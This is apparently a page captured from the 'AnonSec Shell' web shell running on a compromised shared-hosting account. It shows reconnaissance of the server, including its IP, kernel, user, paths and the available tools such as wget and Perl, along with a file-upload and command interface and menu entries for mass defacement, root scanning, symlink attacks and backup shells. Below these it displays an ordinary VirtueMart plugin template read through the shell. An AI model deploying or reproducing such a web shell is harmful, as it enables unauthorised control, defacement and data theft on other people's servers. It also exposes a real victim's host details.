AnonSec Shell
Server IP : 87.98.231.4  /  Your IP : 216.73.217.178   [ Reverse IP ]
Web Server : Apache
System : Linux webm007.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : grupmartgn ( 667608)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/grupmartgn/elanartcrafts/plugins/vmcustom/istraxx_download_simple/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/grupmartgn/elanartcrafts/plugins/vmcustom/istraxx_download_simple/tmpl/order.php
<?php
defined('_JEXEC') or die();

/**
 * Downlodable media plugin for Product
 *
 * @version $Id:
 * @package VirtueMart
 * @subpackage Plugins - istraxx download_simple
 * @author Max Milbers
 * @copyright Copyright (C) 2012-2018 iStraxx - All rights reserved.
 * @license LGPLv3
 *
 */


if(!empty($viewData[3]->free_download)){
	$free_download = $viewData[3]->free_download;
} else $free_download = 0;

$media = $viewData[0];
$url = $viewData[1];
$item = $viewData[2];

if (!empty($free_download) or $item->order_status == 'S' or $item->order_status == 'C') {
	$icon = '';

		$format = vRequest::getCmd('format',false);
		echo '<img src="'.$this->getPathUrlOnly('tmpl/disk.jpg',$format).'">';

		echo JHTML::link($url, $icon . ' ' . vmText::_('VMCUSTOM_ISTRAXX_DOWNLOAD_LINK_FOR') . ' ' . $media->file_title, array('title' => $media->file_title));

} else {
	$order_status_name = ShopFunctions::getOrderStatusName ($item->order_status);
	echo vmText::sprintf ('VMCUSTOM_ISTRAXX_DOWNLOAD_PAYMENT_NOT_CONFIRMED', '');
	echo '<span>' . $media->file_title . '</span>';
}

Anon7 - 2022
AnonSec Team